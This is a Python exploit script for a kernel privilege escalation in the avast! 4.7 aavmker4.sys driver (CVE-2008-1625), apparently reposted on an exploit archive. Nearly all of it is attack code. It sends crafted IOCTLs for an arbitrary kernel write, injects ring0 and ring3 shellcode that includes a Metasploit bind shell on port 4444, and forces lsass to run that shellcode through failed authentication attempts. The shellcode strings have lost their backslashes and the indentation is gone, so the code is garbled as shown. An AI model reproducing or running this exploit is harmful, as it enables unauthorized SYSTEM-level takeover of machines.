Advertisement
#!/usr/bin/python
# avast! 4.7 aavmker4.sys privilege escalation
# http://www.trapkit.de/advisories/TKADV2008-002.txt
# CVE-2008-1625
# Tested on WindXpSp2/Sp3 Dep ON
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 17/04/2010
# Tested on WinXPSP2/SP3 english | avast! 4.7.1098.0
from ctypes import *
import time, struct, sys, thread, os
kernel32 = windll.kernel32
Psapi = windll.Psapi
def findSysBase(drv):
print "(+) Retrieving %s base address..." % drv
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drivername.value.lower() == drv:
print "(+) Address retrieved: %s" % hex(baseaddy)
return baseaddy
return None
def checkShell():
check = "netstat -an | find "4444""
res = os.popen(check)
ret = res.read()
res.close()
if ret.find("0.0.0.0:4444") != -1:
return True
else:
return False
def kickLsass():
time.sleep(10)
lsas1 = "echo hola | runas /user:administrator cmd.exe > NUL"
lsas2 = "net use \\127.0.0.1 /user:administrator test > NUL"
nc = "nc 127.0.0.1 4444"
print "(!) NO BSOD? good sign :)"
print "(*) Sleeping 60 secs before the Woshi finger hold..."
time.sleep(60)
# Trying to kick ls-ass, any auth good or failed should help
# if this doesn't work for you try to rdp to the vuln box or
# logout/login from console... it's rough but should work ;)
print "(+) Trying to fail an auth to trigger syscall..."
os.system(lsas1)
time.sleep(1)
os.system(lsas2)
while 1:
res = checkShell()
if res:
print "($) Shell is ready 0.0.0.0:4444"
#os.system(nc)
#print "(-) netcat not in path but shell is open!"
break
print "(*) Retrying. Sleeping 30 secs..."
time.sleep(30)
print "(+) Trying to fail an auth to trigger syscall..."
os.system(lsas1)
time.sleep(1)
os.system(lsas2)
def pwnDrv(driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output,
out_size, dwReturn1):
# We trigger func pointer to control EIP
time.sleep(5)
print "(+) Owning EIP..."
for i in range(1,3):
print "(+) Triggering function pointer: %d/2" % i
dev_ioctl = kernel32.DeviceIoControl(driver_handle2, IOCTL_EIP, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
time.sleep(0.5)
if __name__ == '__main__':
print "(*) avast! 4.7 aavmker4.sys privilege escalation"
print "(+) coded by Matteo Memelli aka ryujin -> at <- offsec.com"
print "(+) www.offsec.com || Spaghetti & Pwnsauce"
print "(+) tested on WinXPSP2/SP3 DEP On 17/04/2010"
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
IOCTL_STOR = 0xb2d6001c # stores stuff to bypass checks in .data
IOCTL_VULN = 0xb2d60030 # writes to arbitrary memory
IOCTL_EIP = 0xb2d60020 # triggers function pointer to own EIP
# DosDevicesAAVMKER4 DeviceAavmKer4
DEVICE_NAME = "\\.\AavmKer4"
dwReturn1 = c_ulong()
dwReturn2 = c_ulong()
evil_size = 0x878
out_size = 0x1024
stor_size = 0x418
evil_output = ""
stor_output = ""
driver_name = 'aavmker4.sys'
# evil_input = 0x878
# Payload = 496 bytes
# ring0_migrate = 45 bytes || # xf0x01 bytes to copy
ring0_migrate = (
"xfcxfaxebx24x5ex68x76x01x00x00x59x0fx32x89x86x69"
"x00x00x00x8bxbex6dx00x00x00x89xf8x0fx30xb9xf0x01"
"x00x00xf3xa4xfbxf4xebxfdxe8xd7xffxffxff" )
# ring0_msr = 117 bytes
ring0_msr = (
"x6ax00x9cx60xe8x00x00x00x00x58x8bx98x60x00x00x00"
"x89x5cx24x24x81xf9xdexc0xadxdex75x10x68x76x01x00"
"x00x59x89xd8x31xd2x0fx30x31xc0xebx3ax8bx32x0fxb6"
"x1ex66x81xfbxc3x00x75x2ex8bx98x68x00x00x00x8dx9b"
"x75x00x00x00x89x1axb8x01x00x00x80x0fxa2x81xe2x00"
"x00x10x00x74x11xbax00xffx3fxc0x81xc2x04x00x00x00"
"x81x22xffxffxffx7fx61x9dxc3xffxffxffxffx00x04xdf"
"xffx00x04xfex7f" )
# ring3_stager = 61 bytes
ring3_stager = (
"x60x6ax30x58x99x64x8bx18x39x53x0cx74x2ex8bx43x10"
"x8bx40x3cx83xc0x28x8bx08x03x48x03x81xf9x6cx61x73"
"x73x75x18xe8x0ax00x00x00xe8x10x00x00x00xe9x09x00"
"x00x00xb9xdexc0xadxdex89xe2x0fx34x61xc3" )
# msf payload: bindshell port 4444 318 bytes
ring3_shellcode = (
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0xc3" )
sysbase = findSysBase(driver_name)
if not sysbase:
print "(-) Couldn't retrieve driver base address, exiting..."
sys.exit()
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
driver_handle2 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
# .data memory area we write to; offset from base = 0x2e04
read_data_from= struct.pack('L', sysbase+0x2e04) # calculate addy in .data
# r0_address = noplsed address, jump 0xfa bytes ahead to avoid a corrupted nop
r0_address = struct.pack('L', sysbase+0x23fa)
evil_input = r0_address*2 + "x90"*0x102
evil_input += ring0_migrate + ring0_msr + ring3_stager + ring3_shellcode
evil_input += "x41"*0x549
evil_input += read_data_from + "x42x42x42x42" # bypass input checks
stor_input = "x43x43x43x43" # padding
stor_input += "x07xADxDExD0" # cmp dword ptr [eax], 0D0DEAD07h
stor_input += "xBAxD0xBAx10" # cmp dword ptr [eax+4], 10BAD0BAh
stor_input += "x44x44x44x44"*2
# After arbitrary write to memory nt!KeSetEvent is called: we need to fix
# nt!KeSetEvent+0x32 using any addy pointing to value different to 0x01
# so we can use our "read_data_from" again.
stor_input += read_data_from
stor_input += "x44x44x44x44"
# 0x2300 offset from base: we write here to control a function pointer
# and own EIP
stor_input += struct.pack('L', sysbase+0x2300) + "x45"*414
# trigger these later on...
thread.start_new(pwnDrv, (driver_handle2, IOCTL_EIP, stor_input, stor_size,
stor_output, out_size, dwReturn1))
thread.start_new(kickLsass, ())
###########################################################################
# And now let's own the boy:
if driver_handle1:
# We store values to overcome input checks
print "(+) Storing our precious in kernel space ;) ..."
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_STOR, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
# We trigger arbitrary write
print "(*) Sending evil IOCTL..."
print "(+) Pwnage in progress...."
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_VULN,
evil_input, evil_size, evil_output,
evil_size,
byref(dwReturn2), None)
Copyright ©2022 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.